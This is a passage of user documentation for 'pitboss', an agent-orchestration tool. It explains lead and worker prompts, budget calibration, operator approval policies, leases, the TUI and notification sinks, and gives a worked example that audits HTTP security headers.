Instruct the lead explicitly:
When all workers have completed (or budget is exhausted), produce a final report
with the following sections in this order:
1. STATUS: one of "success", "partial", or "failed"
2. COMPLETED: one bullet per worker — worker ID, input, one-sentence result
3. DEFERRED OR FAILED: one bullet per unprocessed input — input and reason
4. COST SUMMARY: list of worker IDs and their approximate spend in USD
Do not include any text after the final report.
The structure matters: tools that parse final_message_preview (notification webhooks, downstream scripts) need a predictable format. Even if you’re just reading it yourself in the TUI, a consistent structure is much easier to scan.
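As a sketch of why the fixed section order pays off downstream, a post-run script can extract the status with a few lines of string handling. This is a hypothetical helper, not part of pitboss, and it assumes the exact report format shown above:

```rust
/// Extract the STATUS value from a report that follows the template above.
/// Returns None when the lead ended with free-form chatter instead.
fn parse_status(report: &str) -> Option<&str> {
    report
        .lines()
        .find(|line| line.trim_start().starts_with("1. STATUS:"))
        .and_then(|line| line.split(':').nth(1))
        .map(|value| value.trim().trim_matches('"'))
}

fn main() {
    let report = "1. STATUS: \"partial\"\n2. COMPLETED: ...";
    assert_eq!(parse_status(report), Some("partial"));
    // A chatty sign-off yields no status at all: exactly the failure mode
    // the summary instruction is designed to prevent.
    assert_eq!(parse_status("Let me know if you need anything else"), None);
}
```

The same predictability benefits notification webhooks: a consumer can key its alert color off one well-known line instead of guessing at prose.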
A complete example
The following lead prompt audits HTTP security headers across a list of URLs. It incorporates all the patterns above: explicit non-execution framing, decomposition heuristic, worker template, best-effort failure handling, budget exhaustion guard, and a structured summary.
[[lead]]
id = "security-audit"
model = "claude-haiku-4-5"
directory = "/tmp/audit-workdir"
prompt = """
Your job is to COORDINATE this security audit. Do NOT fetch any URLs or check
any headers yourself — that is the workers' job.
## Decomposition
Read /tmp/urls.txt. It contains one URL per line.
Spawn exactly one worker per URL via spawn_worker.
Worker parameters:
model = "claude-sonnet-4-6"
budget_usd = 0.20
tools = ["WebFetch", "Read"]
Use this exact prompt template for each worker (substitute [URL] and [N]):
---
You are worker [N] auditing [URL].
Fetch the URL's HTTP response headers using WebFetch.
Check for these headers: Content-Security-Policy, X-Frame-Options,
Strict-Transport-Security, X-Content-Type-Options, Referrer-Policy.
Produce a report with exactly three sections:
FOUND: list each present header and its value (one per line)
MISSING: list each absent header (one per line)
RECOMMENDATION: one sentence per missing header explaining why it matters
Keep the report under 400 words. No other content.
---
## Waiting
After spawning all workers, call wait_actor on each worker_id before continuing.
## Failure handling
If a worker returns an error, record the failure and continue with remaining workers.
Do not retry. In the final report, list which URLs were not processed and why.
## Budget exhaustion
Before each spawn_worker call, check your remaining budget. If insufficient for
another worker, stop spawning and proceed to the final report, listing which URLs
were deferred.
## Final report
When all workers have completed or you have exhausted your budget, produce a report
with these sections in order:
1. STATUS: "success", "partial", or "failed"
2. COMPLETED: one bullet per processed URL — URL, finding summary (one sentence)
3. DEFERRED OR FAILED: one bullet per unprocessed URL — URL, reason
4. COST SUMMARY: worker IDs and approximate spend in USD
Do not include any text after the final report.
"""
Operators can adapt this template by swapping the decomposition axis (files instead of URLs, phases instead of inputs), adjusting the worker model and budget, and replacing the worker prompt template with task-specific instructions.
See also
- Approvals — for leads that gate actions on operator review before proceeding
- Defense-in-depth → Read-only lead pattern — for leads structured as read-only auditors that delegate writes to approved workers
Cost & model selection
budget_usd is a hard guardrail, but it only protects you after the fact. Good operators set it based on a prior estimate of what the run should cost — and pick models that match the reasoning demands of each role. This page covers how to calibrate both.
Pricing note: The figures in this page are approximate snapshots from early 2026. Anthropic’s pricing changes over time. Before committing to a budget for a production run, verify current rates at https://www.anthropic.com/pricing.
The three model pricing tiers (as of 2026)
| Model | Input ($/MTok) | Output ($/MTok) | Best for |
|---|---|---|---|
| claude-haiku-4-5 | ~$1 | ~$5 | High-volume simple decisions, leads orchestrating small jobs, cheap first-pass triage |
| claude-sonnet-4-6 | ~$3 | ~$15 | Most general-purpose reasoning and code work; default for workers that need to think |
| claude-opus-4-7 | ~$15 | ~$75 | Deep reasoning on genuinely hard problems; rarely necessary for routine code or text |
These are approximate figures. Verify at https://www.anthropic.com/pricing before calibrating production budgets.
Calibrating budget_usd from typical worker costs
Worker cost is driven by token volume — how many tokens the worker reads (input) and generates (output). The table below gives rough orders of magnitude for common task types. Measure your own workloads; these are starting points, not guarantees.
| Task type | Typical token usage | Approx cost — Haiku 4.5 | Approx cost — Sonnet 4.6 |
|---|---|---|---|
| Small code review (one file, <500 LOC) | 5K–15K tokens | $0.02–$0.08 | $0.06–$0.25 |
| Medium audit (a few files + structured report) | 15K–50K tokens | $0.08–$0.30 | $0.25–$1.00 |
| Large refactor (many files, multi-turn) | 50K–200K tokens | $0.30–$1.50 | $1–$5 |
| Continuous test loop (with reprompts) | 100K–500K tokens | $0.50–$3 | $2–$10 |
Reservation overhead
When you call spawn_worker, pitboss reserves the worker’s estimated_cost_usd against the run’s budget before the worker starts. On completion, the reservation is released and the actual spend is recorded. This prevents budget overruns but has a practical consequence: if your estimate is too low, spawn_worker fails (“budget exceeded”) before the worker has done anything. If too high, other workers can’t spawn until the first one finishes and releases its reservation.
Practical defaults:
- Set `estimated_cost_usd` per worker at 1.5× your typical actual cost for that task type. The 50% margin accounts for variance in input size and response verbosity.
- Set `budget_usd` at 1.2× the sum of all expected worker estimates. The 20% margin covers the lead’s own token use and any workers that run over their estimate.
Example for a run with 5 medium-audit workers (Sonnet 4.6, expected ~$0.50 each):
estimated_cost_usd per worker = $0.50 × 1.5 = $0.75
Sum of estimates = 5 × $0.75 = $3.75
budget_usd = $3.75 × 1.2 = $4.50
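The arithmetic above generalizes to a two-line helper. This is an illustrative sketch using the suggested default margins, not a pitboss API:

```rust
/// Derive per-worker reservation and run budget from a typical observed cost.
/// Margins follow the suggested defaults: 1.5x per worker, 1.2x for the run.
fn calibrate(typical_cost_usd: f64, workers: u32) -> (f64, f64) {
    let estimated_cost_usd = typical_cost_usd * 1.5; // per-worker reservation
    let budget_usd = estimated_cost_usd * workers as f64 * 1.2; // run-level cap
    (estimated_cost_usd, budget_usd)
}

fn main() {
    // 5 medium-audit workers at ~$0.50 each, as in the worked example.
    let (est, budget) = calibrate(0.50, 5);
    println!("estimated_cost_usd = {est:.2}, budget_usd = {budget:.2}");
}
```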
Cross-reference: Manifest schema → budget_usd for the full reservation accounting semantics.
The “Haiku-as-lead, Sonnet-as-worker” pattern
The most common cost-effective pattern for hierarchical runs:
- The lead’s job is tool dispatch and simple decisions — which worker to spawn next, when to stop, how to aggregate results. This is not demanding reasoning. Haiku handles it well at roughly one-third the input cost of Sonnet.
- Workers do the actual reasoning — reading code, writing reports, producing patches. Sonnet’s stronger tool use and reasoning quality is worth the cost premium at the task level.
A typical depth-1 run with 5 workers under this pattern:
- Lead (Haiku, ~$0.05 total): reads the task list, spawns workers, waits, summarizes
- 5 workers (Sonnet, ~$0.20 each = ~$1.00 total)
- Total: ~$1.05
The alternative — Sonnet-as-lead with Sonnet-as-worker — costs the same or more, but wastes Sonnet’s reasoning capacity on loop bookkeeping the lead doesn’t need.
When not to use this pattern
Use Sonnet (or higher) for the lead when:
- The lead makes complex strategic decisions. If the lead needs to interpret cross-worker results and decide whether to change approach mid-run, Haiku’s reasoning limitations become a bottleneck.
- The lead is synthesizing across many outputs into a unified artifact. Writing a coherent 10-section report that synthesizes 20 worker results is reasoning-heavy work. Use Sonnet.
- The plan requires backtracking. Multi-step plans where the lead must detect failures and re-plan benefit from Sonnet’s stronger context handling.
Haiku-as-lead works best when the lead’s decision tree is shallow: “for each item, spawn a worker; wait for all; write a summary.” For anything more complex, consider Sonnet.
Sub-leads and cost compounding
With depth-2 sub-leads (v0.6+), costs multiply across tiers:
Root lead (1 session)
├── Sub-lead A (1 session)
│ ├── Worker A1 (1 session)
│ ├── Worker A2 (1 session)
│ └── Worker A3 (1 session)
├── Sub-lead B (1 session)
│ └── ...
└── Sub-lead C (1 session)
└── ...
A run with 1 root + 3 sub-leads + 4 workers each = 16 sessions. At Haiku-only pricing, even a 50K-token/session average is 800K tokens, which costs ~$0.80–$4 depending on the input/output split. At Sonnet pricing the same run is ~$2.40–$12.
Sub-lead cost control mechanisms in the manifest:
[run]
budget_usd = 20.00
[[lead]]
id = "root"
model = "claude-haiku-4-5"
allow_subleads = true
max_subleads = 4
max_sublead_budget_usd = 3.00 # hard ceiling per sub-lead
max_workers_across_tree = 12 # bounds peak concurrency (and peak spend rate)
[lead.sublead_defaults]
budget_usd = 2.00 # default envelope per sub-lead
max_workers = 3
lead_timeout_secs = 1800
sublead_defaults means you don’t have to specify budget on every spawn_sublead call. max_sublead_budget_usd is a hard ceiling enforced by pitboss — the root lead cannot accidentally grant more even if its prompt instructs it to.
See Depth-2 sub-leads for the full sub-lead envelope model.
Reservation overhead in practice
Understanding the reservation lifecycle helps diagnose “budget exceeded” failures that appear before workers have done any work.
The lifecycle:
1. `spawn_worker` is called with `estimated_cost_usd = X`.
2. Pitboss checks: `spent + reserved + X ≤ budget_usd`. If not, the spawn fails.
3. If the check passes, X is added to `reserved_usd` and the worker starts.
4. On completion, X is released from `reserved_usd` and actual spend is added to `spent_usd`.
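A minimal model of this check, for intuition. The struct and method names here are illustrative assumptions, not pitboss’s internals:

```rust
/// Toy model of run-budget accounting: reservations are checked against the
/// budget before a worker starts and reconciled against actual spend after.
struct BudgetLedger {
    budget_usd: f64,
    spent_usd: f64,
    reserved_usd: f64,
}

impl BudgetLedger {
    /// Reserve only if the estimate still fits under the budget.
    fn try_reserve(&mut self, estimated_cost_usd: f64) -> bool {
        if self.spent_usd + self.reserved_usd + estimated_cost_usd <= self.budget_usd {
            self.reserved_usd += estimated_cost_usd;
            true
        } else {
            false
        }
    }

    /// Release the reservation and record what was actually spent.
    fn settle(&mut self, estimated_cost_usd: f64, actual_cost_usd: f64) {
        self.reserved_usd -= estimated_cost_usd;
        self.spent_usd += actual_cost_usd;
    }
}

fn main() {
    let mut ledger = BudgetLedger { budget_usd: 6.0, spent_usd: 0.0, reserved_usd: 0.0 };
    // Three $2 reservations fit under a $6 budget; the fourth is refused
    // until a running worker settles and releases its slice.
    assert!(ledger.try_reserve(2.0));
    assert!(ledger.try_reserve(2.0));
    assert!(ledger.try_reserve(2.0));
    assert!(!ledger.try_reserve(2.0));
    ledger.settle(2.0, 1.0);
    assert!((ledger.reserved_usd - 4.0).abs() < 1e-9);
}
```

Note how the over-reserving pitfall falls out of the model: the larger each estimate, the fewer reservations fit concurrently.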
Common pitfalls:
- Over-reserving (“to be safe”): Setting `estimated_cost_usd` high means each worker blocks a large slice of the budget. With 5 workers each estimated at $2 and a $6 budget, only 3 workers can be in-flight at once — the fourth and fifth spawn calls fail until a slot releases. The run serializes instead of parallelizing.
- Under-reserving: If a worker’s actual spend exceeds its estimate, pitboss reconciles on completion. This won’t crash the worker mid-task, but `spent_usd` will exceed `budget_usd` on reconciliation. Pitboss records the overrun but does not retroactively kill the offending worker.
- Reservation leak: In rare cases (subprocess crash before reconciliation, pre-Phase-4 race conditions), a reservation stays held after the worker is gone. The reservation releases on pitboss restart. Use `pitboss attach` to monitor `reserved_usd` in real time and spot this pattern.
Mitigations:
- Derive estimates from observed history. Run 3–5 representative tasks manually, measure actual token usage, and set `estimated_cost_usd` at 1.5× the observed mean.
- Monitor with `pitboss attach` during the first few runs of a new manifest to validate your estimate calibration.
- Set `budget_usd` with 20% headroom over the sum of expected estimates.
See also
- Manifest schema — `budget_usd`, `estimated_cost_usd`, `max_sublead_budget_usd` field reference
- Depth-2 sub-leads — sub-lead envelope mechanics and `sublead_defaults`
- Defense-in-depth → Cost firewall pattern — using per-sub-lead budget envelopes as a security control against runaway spend
Approvals
Pitboss provides two approval primitives that let a lead gate actions on operator review:
- `request_approval` — gate a single in-flight action on operator approval.
- `propose_plan` — gate the entire run on a pre-flight plan approval.
Both route to the TUI’s approval pane. Without a TUI attached, the [run].approval_policy field controls automatic behavior.
request_approval
The lead calls request_approval when it wants the operator to review a specific action before proceeding. The lead blocks until the operator approves, rejects, or edits.
Args:
{
"summary": "string",
"timeout_secs": 60,
"plan": {
"summary": "string",
"rationale": "string",
"resources": ["path/to/file.rs"],
"risks": ["May overwrite uncommitted changes"],
"rollback": "git checkout -- path/to/file.rs"
}
}
The plan field is optional but strongly recommended for non-trivial actions (deletions, multi-file edits, irreversible operations). The TUI renders the structured fields as labeled sections, with risks highlighted in warning color.
Returns:
{
"approved": true,
"comment": "optional operator comment",
"edited_summary": "optional edited version"
}
propose_plan
The lead calls propose_plan before spawning any workers when a pre-flight review is desired. When [run].require_plan_approval = true, spawn_worker refuses until a propose_plan call has been approved.
The TUI modal shows [PRE-FLIGHT PLAN] in its title (vs [IN-FLIGHT ACTION] for request_approval). On rejection, the gate stays closed — the lead can revise and call propose_plan again.
When require_plan_approval = false (the default), calling propose_plan is still valid but informational only — spawn_worker never checks the result.
[run].approval_policy
Controls handling of approval requests when no TUI is attached:
| Value | Behavior |
|---|---|
"block" (default) | Queue until a TUI connects, or until lead_timeout_secs expires. |
"auto_approve" | Immediately approve. Useful for CI or unattended runs. |
"auto_reject" | Immediately reject with comment: "no operator available". |
[[approval_policy]] — declarative policy rules (v0.6+)
For finer control, declare deterministic policy rules in the manifest. Rules are evaluated in pure Rust — not LLM-evaluated — before approvals reach the operator queue.
# Auto-approve routine tool-use from sub-lead S1
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use" }
action = "auto_approve"
# Always block plan-category approvals for explicit review
[[approval_policy]]
match = { category = "plan" }
action = "block"
# Block any cost event over $0.50
[[approval_policy]]
match = { category = "cost", cost_over = 0.50 }
action = "block"
Rules are evaluated first-match-wins in declaration order. A request that doesn’t match any rule falls through to the run-level approval_policy.
Match fields
| Field | Type | Notes |
|---|---|---|
actor | string | Actor path, e.g., "root→S1". Unset matches all actors. |
category | string | "tool_use", "plan", "cost". Unset matches all categories. |
tool_name | string | Specific MCP tool name. Unset matches all. |
cost_over | float | Fires when cost_estimate > cost_over (USD). |
Actions
| Action | Effect |
|---|---|
"auto_approve" | Immediately approve; never reaches the operator queue. |
"auto_reject" | Immediately reject. |
"block" | Force operator review regardless of run-level approval_policy. |
Approval TTL and fallback (v0.6+)
Each approval request can carry an optional TTL:
- `timeout_secs` — the lead can pass a timeout on its `request_approval` call.
- `fallback` — if the approval ages past its TTL without an operator response, the fallback fires (`auto_reject`, `auto_approve`, or `block`). Prevents an unreachable operator from permanently stalling the tree.
TUI approval pane
In the TUI, a non-modal right-rail (30% width) shows pending approvals as a queue. Press 'a' to focus the pane; Up/Down navigate; Enter opens the detail modal.
In the modal:
- `y` — approve
- `n` — reject (can add an optional reason comment)
- `e` — edit (Ctrl+Enter to submit, Esc to cancel)
The reject branch accepts an optional reason string that flows back through MCP to the requesting actor’s session, allowing Claude to adapt without a separate reprompt_worker round-trip.
Reject-with-reason
When an approval is rejected with a reason, the reason is included in the MCP response returned to the lead. This allows the lead to adapt its behavior immediately (e.g., switch output format, try a different approach) without requiring a separate reprompt_worker call.
Using approvals as a security control
[[approval_policy]] can be used to gate state-changing tool invocations before they execute, independent of operator availability. See Security → Defense-in-depth → Approval-gated state-changing tools for a manifest pattern that auto-approves reads and blocks writes for operator review.
Approval policy reference
Overview
The [[approval_policy]] TOML block defines deterministic approval rules that auto-resolve requests before they reach the operator. Rules are pure Rust evaluation, NOT LLM-evaluated.
Each rule matches against fixed approval fields (actor path, category, tool name, cost estimate) and applies an action (auto_approve, auto_reject, or block). Rules are evaluated in declaration order; the first match wins. If no rule matches, the approval falls through to the run-level [run].approval_policy (or the operator queue if no default is set).
Why it exists: At depth-2 scale where N concurrent sub-leads can spawn M approval requests each, the operator queue drowns in noise. Policy rules handle routine approvals deterministically, surfacing only exceptional cases.
TOML syntax
[[approval_policy]]
match = { actor = "root→S1", category = "tool_use", tool_name = "Bash", cost_over = 0.50 }
action = "auto_approve"
[[approval_policy]]
match = { category = "plan" }
action = "block"
- `[[approval_policy]]` — each rule is a separate array-of-tables block.
- `match` — TOML inline table of conditions. All fields are optional; an empty `match = {}` matches every approval (catch-all). Multiple match fields use AND semantics.
- `action` — one of `"auto_approve"`, `"auto_reject"`, or `"block"`.
Match fields reference
| Field | Type | Matches when | Notes |
|---|---|---|---|
actor | string (optional) | The approval’s actor_path rendered as a string (e.g., "root" or "root→S1") equals the value | Use "root" for root-level requests. Use "root→<sublead_id>" for a specific sub-lead; sub-lead IDs are UUIDv7 and runtime-generated, so this field is most useful when you know the sub-lead’s identity in advance — e.g., from a prior spawn_sublead response. Exact string match only; no wildcard patterns. |
category | enum (optional) | The approval’s category field equals the value exactly | Allowed values: "tool_use", "plan", "cost", "other". Most request_approval calls land in tool_use; propose_plan lands in plan. Cost-category approvals are not emitted by default (see deferment notes). |
tool_name | string (optional) | The lead’s optional tool_name hint on request_approval equals the value | Only fires if the lead populates the optional tool_name arg. Without it, this field never matches. Exact string match only. |
cost_over | float (optional) | The lead’s optional cost_estimate hint exceeds this threshold (strict > comparison) | Only fires if the lead passes a cost_estimate arg to request_approval. Without it, this field never matches. Numeric greater-than comparison. |
Action values
| Action | Effect |
|---|---|
"auto_approve" | Approval is resolved as approved without operator interaction. The requesting actor’s MCP call returns approved=true immediately. Logged at info level for audit trail. |
"auto_reject" | Approval is resolved as rejected without operator interaction. The requesting actor receives approved=false. The response includes reason text "auto-rejected by policy". |
"block" | Forces the approval to enqueue for operator action regardless of its match. Overrides any run-level [run].approval_policy default that would be permissive. Useful for “always require explicit approval for X” rules. |
Evaluation order and semantics
- Rules are evaluated in declaration order from top to bottom in the manifest.
- The first rule whose `match` clause fully matches (all specified fields match) wins. Its `action` is applied immediately.
- If no rule matches, the approval falls through to the run-level `[run].approval_policy` value.
- If no run-level policy is set and no rule matches, the approval is queued for the operator (the default v0.5 behavior).
- A `block` action does NOT short-circuit further rule evaluation for other approvals. It only guarantees the current approval reaches the operator queue.
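The first-match-wins evaluation can be sketched in a few lines of Rust. Types and field names here are illustrative assumptions, not pitboss’s actual implementation, and only `actor` and `category` matching is shown:

```rust
#[derive(Debug, Clone, Copy, PartialEq)]
enum Action { AutoApprove, AutoReject, Block }

/// One [[approval_policy]] rule; None in a match field means "matches all".
struct Rule {
    actor: Option<&'static str>,
    category: Option<&'static str>,
    action: Action,
}

struct Request<'a> {
    actor: &'a str,
    category: &'a str,
}

/// The first rule whose specified fields all match wins. None means the
/// approval falls through to the run-level [run].approval_policy.
fn evaluate(rules: &[Rule], req: &Request) -> Option<Action> {
    rules
        .iter()
        .find(|r| {
            r.actor.map_or(true, |a| a == req.actor)
                && r.category.map_or(true, |c| c == req.category)
        })
        .map(|r| r.action)
}

fn main() {
    let rules = [
        Rule { actor: None, category: Some("plan"), action: Action::Block },
        Rule { actor: Some("root→S1"), category: Some("tool_use"), action: Action::AutoApprove },
    ];
    // Plan approvals from any actor hit the first rule.
    assert_eq!(evaluate(&rules, &Request { actor: "root", category: "plan" }), Some(Action::Block));
    // Tool use from an unmatched actor falls through to the run-level policy.
    assert_eq!(evaluate(&rules, &Request { actor: "root→S2", category: "tool_use" }), None);
}
```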
Worked examples
Pattern A: Auto-approve routine reads, surface mutations
[[approval_policy]]
match = { tool_name = "Read" }
action = "auto_approve"
[[approval_policy]]
match = { tool_name = "Glob" }
action = "auto_approve"
[[approval_policy]]
match = { tool_name = "Grep" }
action = "auto_approve"
# Everything else (Bash, Write, Edit, etc.) falls through to operator
How it works: Leads must populate tool_name on their request_approval calls for this to work. File reads are auto-approved, reducing noise. Any other tool (including Write, Edit, Bash, or custom MCP tools) reaches the operator.
Note: Requires the lead’s prompt to pass tool_name on every request_approval call. Without it, these rules won’t fire.
Pattern B: Block all plan approvals, auto-approve trusted sub-lead’s tool use
[[approval_policy]]
match = { category = "plan" }
action = "block"
[[approval_policy]]
match = { actor = "root→sublead-trusted-id", category = "tool_use" }
action = "auto_approve"
How it works: Order matters. The category = "plan" rule fires first, blocking all propose_plan calls for explicit operator review. The second rule auto-approves tool-use from a specific trusted sub-lead (once you know its UUIDv7). Tool-use from other actors falls through to the operator.
When to use: Multi-phase runs where you want to gate each phase’s plan proposal (to catch logic errors early) but trust a specific sub-lead’s tool invocations.
Pattern C: Cost-bounded auto-approval
[[approval_policy]]
match = { category = "cost", cost_over = 1.00 }
action = "block"
[[approval_policy]]
match = { category = "cost" }
action = "auto_approve"
How it works: Cost-category approvals over $1.00 always reach the operator. Smaller ones auto-approve. This is a firewall against unexpectedly expensive operations.
Note: This pattern is forward-looking. As of v0.6, leads do not emit cost-category approvals by default. The lead must explicitly call request_approval with category = "cost" for these rules to fire. See deferment notes below.
Deferment notes
The following features are not in v0.6 but are requested or planned:
Runtime policy mutation
TUI commands to add/remove rules mid-run are deferred to v0.7+. v0.6 reads the policy once at manifest load. You cannot change rules while a run is in flight.
No regex or glob patterns in match values
Match fields support exact string comparison only. Wildcard patterns like tool_name = "Read*" or actor = "root→sublead-*" are not supported. Matching is literal. If you have a use case that needs wildcard matching (e.g., “auto-approve all Read variants”), please file an issue.
Cost-category approvals are not emitted by default
The request_approval MCP tool defaults to category = "tool_use". For cost-category rules to fire in practice, the lead must explicitly pass category = "cost" when calling request_approval. Most leads don’t do this yet, so cost-category rules have limited utility in v0.6.
Rule-index attribution in logs
Auto-action logs say “auto-approved by policy” or “auto-rejected by policy” but do not (currently) name which rule fired. Adding rule indices to audit logs is a small followup that would help track which policy pattern is in effect.
See also
- Approvals — operator-side workflow (TUI pane, reject-with-reason, TTL fallback)
- Defense-in-depth → Approval-gated state-changing tools — how to use policy as a security control pattern
- MCP Tool Reference → Approvals — the underlying
request_approvalandpropose_planMCP tools
Leases & coordination
Pitboss provides a hierarchical coordination surface for workers and leads:
- Per-layer KV store — an in-memory key-value store per dispatch layer (root, each sub-lead). Four namespaces with different access rules.
- Per-layer leases — the `/leases/*` namespace within each layer’s KV store.
- Run-global leases — `run_lease_acquire` / `run_lease_release` for cross-tree coordination (v0.6+).
The KV namespaces
All KV tools operate on paths within the current layer’s store.
| Namespace | Who can write | Who can read | Use for |
|---|---|---|---|
/ref/* | Lead only | All actors in this layer | Shared configuration, task lists, conventions the lead wants all workers to see |
/peer/<actor-id>/* | That actor only (and lead as override) | That actor + the layer’s lead | Per-worker outputs (findings, status flags, partial results) |
/peer/self/* | Any actor | — | Alias: the dispatcher resolves /peer/self/ to /peer/<caller.actor_id>/ at the tool layer |
/shared/* | All actors | All actors | Loose cross-worker coordination (shared findings, counters) |
/leases/* | Managed via lease_acquire / lease_release | — | Mutual exclusion within this layer |
KV tools
| Tool | Purpose |
|---|---|
kv_get | Read a single entry by path |
kv_set | Write a value; bumps version on each write |
kv_cas | Compare-and-swap: write only if the current version matches expected_version |
kv_list | List entries matching a glob pattern |
kv_wait | Block until a path reaches a minimum version (long-poll) |
lease_acquire | Acquire a named lease with a TTL; blocks or fails if held |
lease_release | Release a held lease |
See Coordination & state for full signatures and return shapes.
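The `kv_cas` versioning semantics can be modeled in a few lines. This is an illustrative sketch, not pitboss’s store implementation:

```rust
use std::collections::HashMap;

/// Toy per-layer KV store: each path carries a version that bumps on write.
struct KvStore {
    entries: HashMap<String, (u64, String)>, // path -> (version, value)
}

impl KvStore {
    /// Compare-and-swap: write only if expected_version matches the stored
    /// version. Ok carries the new version; Err carries the current one,
    /// signaling the caller to re-read and retry.
    fn cas(&mut self, path: &str, expected_version: u64, value: String) -> Result<u64, u64> {
        let entry = self
            .entries
            .entry(path.to_string())
            .or_insert((0, String::new()));
        if entry.0 == expected_version {
            entry.0 += 1;
            entry.1 = value;
            Ok(entry.0)
        } else {
            Err(entry.0)
        }
    }
}

fn main() {
    let mut store = KvStore { entries: HashMap::new() };
    assert_eq!(store.cas("/shared/counter", 0, "1".into()), Ok(1));
    // A stale version loses the race and must re-read before retrying.
    assert_eq!(store.cas("/shared/counter", 0, "2".into()), Err(1));
    assert_eq!(store.cas("/shared/counter", 1, "2".into()), Ok(2));
}
```

The version-on-failure return is what makes lock-free coordination practical: a losing worker learns the current version from the error itself rather than issuing a second read.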
Lease acquisition
lease_acquire(name: string, ttl_secs: u32, wait_secs?: u32)
→ { lease_id, version, acquired_at, expires_at }
- `name` — the lease key (a path under `/leases/*`).
- `ttl_secs` — how long the lease lives after acquisition. The lease auto-expires if the holder crashes.
- `wait_secs` — optional: block up to this many seconds for the lease to become available. Default: fail immediately if already held.
Leases are auto-released when the holding actor’s MCP session terminates (connection drop, worker crash, etc.).
Per-layer vs run-global leases
Use /leases/* (per-layer) for resources internal to the current sub-tree:
- A worker-coordinated counter for “next chunk to process within this sub-tree”
- A mutex for a shared file within one phase’s working directory
- Any resource only one sub-tree ever writes to
Use run_lease_acquire (run-global) for resources that span sub-trees:
- A path on the operator’s filesystem that any sub-tree might write to
- A shared service or port that multiple sub-leads compete for
- Any resource that must be serialized across the entire dispatch tree
run_lease_acquire(key: string, ttl_secs: u32) → { lease_id, version }
run_lease_release(lease_id: string) → { ok: true }
The run-global registry is on DispatchState — outside any layer — so it spans all sub-trees.
When in doubt: prefer run_lease_acquire. Over-serializing is safer than silent cross-tree collision.
Shared store dump
Set dump_shared_store = true in [run] to write <run-dir>/shared-store.json at finalize time. Useful for post-mortem inspection of cross-worker coordination state.
[run]
dump_shared_store = true
Using leases as a security control
Run-global leases can serialize access to sensitive shared resources — deploy pipelines, credential stores, shared output paths — preventing concurrent writes from multiple agents. See Security → Defense-in-depth → Run-global lease as serialization gate for a manifest pattern and commentary on what this does and does not protect.
Architecture note
The KV store is in-memory and per-run. It is not persisted between runs (except via the optional shared-store.json dump). Workers in separate runs cannot see each other’s state.
See Lease scope selection for a deeper discussion of the architectural rationale.
TUI
pitboss-tui is the live floor view: a tile grid of all workers in the current run, with live log tailing, budget and token counters, and a full control plane for cancellation, pause, reprompt, and approval management.
Opening the TUI
pitboss-tui # open the most recent run
pitboss-tui 019d99 # open a run by UUID prefix
pitboss-tui list # print a table of runs to stdout
The TUI polls the run directory at 250ms intervals. It can open a run while dispatch is in progress (most useful) or after the fact for post-mortem review.
Grid view
The main view is a tile grid. Each tile represents one actor (lead, sub-lead, or worker). Tiles show:
- Actor role and ID (with ★ for leads, ▸ for workers)
- Current state: Running, Done, Failed, Paused, Frozen, Cancelled, etc.
- Model family color swatch (opus = magenta, sonnet = blue, haiku = green)
- Partial token count and cost estimate
- KV/lease activity counters when non-zero (`kv:N lease:M`)
In depth-2 runs, sub-trees render as collapsible containers with a header showing the sub-lead ID, budget bar, worker count, and approval badge.
Detail view
Press Enter on a tile to open the Detail view. It’s a split pane:
- Left — identity, lifecycle, token totals + cost, activity counters (tool calls / results / top tools), and a one-shot `git diff --shortstat` summary.
- Right — scrollable log with semantic color coding (assistant text = white, tool use = cyan, tool results = green, rate limits = yellow, result events = magenta, system = gray).
Scroll the log:
| Keys | Scroll |
|---|---|
j / k / arrows | 1 row |
J / K | 5 rows |
Ctrl-D / Ctrl-U / PageDown / PageUp | 10 rows |
g / G | Jump to top / bottom (G re-enables auto-follow) |
| Scroll wheel | 5 rows/tick |
Navigation keybindings
| Key | Action |
|---|---|
h j k l / arrows | Navigate tiles in grid view |
Enter | Open Detail view for focused tile |
o | Run picker (switch to another run) |
? | Help overlay (full keybinding reference) |
q / Ctrl-C | Quit |
Esc | Close any overlay or modal |
Tab | Cycle focus across sub-tree containers (depth-2 runs) |
Control plane keybindings
| Key | Action |
|---|---|
x | Cancel focused worker (with confirm modal) |
X | Cancel entire run (cascades to all workers) |
p | Pause focused worker (requires initialized session) |
c | Continue paused worker |
r | Open reprompt textarea (Ctrl+Enter to submit, Esc to cancel) |
Approval pane
Press 'a' to focus the approval list pane (right-rail, 30% width). Pending approvals queue here as they arrive.
| Key | Action |
|---|---|
Up / Down | Navigate the approval queue |
Enter | Open detail modal for selected approval |
In the approval modal:
| Key | Action |
|---|---|
y | Approve |
n | Reject (optionally add a reason comment) |
e | Edit the summary (Ctrl+Enter to submit, Esc to cancel) |
Mouse support
| Action | Effect |
|---|---|
| Left-click tile | Focus + open Detail |
| Left-click run in picker | Open that run |
| Right-click inside Detail | Exit back to grid |
| Scroll wheel inside Detail | Scroll log 5 rows/tick |
pitboss attach — single-worker follow mode
For a terminal-only follow view on one worker without the full TUI:
pitboss attach <run-id> <task-id>
pitboss attach <run-id> <task-id> --raw # stream raw stream-JSON jsonl
pitboss attach <run-id> <task-id> --lines 200 # larger backfill
Run-id is resolved by prefix (first 8 chars are enough when unique). Exits on Ctrl-C or when the worker emits its terminal result.
Notifications
Pitboss can push notifications to external sinks when key run events occur. This is useful for monitoring long-running dispatches from outside the TUI — for example, getting a Slack message when a budget-intensive run finishes.
Configuration
Add a `[[notification]]` section to your manifest for each sink:
```toml
[[notification]]
kind = "slack"
url = "${PITBOSS_SLACK_WEBHOOK_URL}"  # env-var substitution supported (prefix required, see below)
events = ["run_finished", "budget_exceeded"]
severity_min = "info"

[[notification]]
kind = "discord"
url = "${PITBOSS_DISCORD_WEBHOOK_URL}"
events = ["approval_request", "approval_pending", "run_finished"]

[[notification]]
kind = "webhook"
url = "https://my-server.example.com/pitboss-events"
events = ["approval_request", "budget_exceeded", "run_finished"]
```
The sink-type field is `kind`, not `type` — a `type = "slack"` line is rejected with an unknown-field error at validate time.
Supported sinks
| Sink | kind value | Notes |
|---|---|---|
| Generic HTTP POST | "webhook" | Sends a JSON payload with the event |
| Slack Incoming Webhook | "slack" | Formats as a Slack message block |
| Discord Webhook | "discord" | Formats as a Discord embed with severity-coded color, markdown-escaped fields, and allowed_mentions: [] |
| Log only | "log" | Writes to stderr via tracing; useful for debugging + CI contexts where the operator watches logs |
Events
| Event | Severity | When it fires |
|---|---|---|
| approval_request | Warning | An approval is enqueued for operator action (v0.6+) |
| approval_pending | Warning | An approval enqueues and awaits operator action with no TUI attached (v0.6+) — distinct from approval_request, for alerting when a run is blocked |
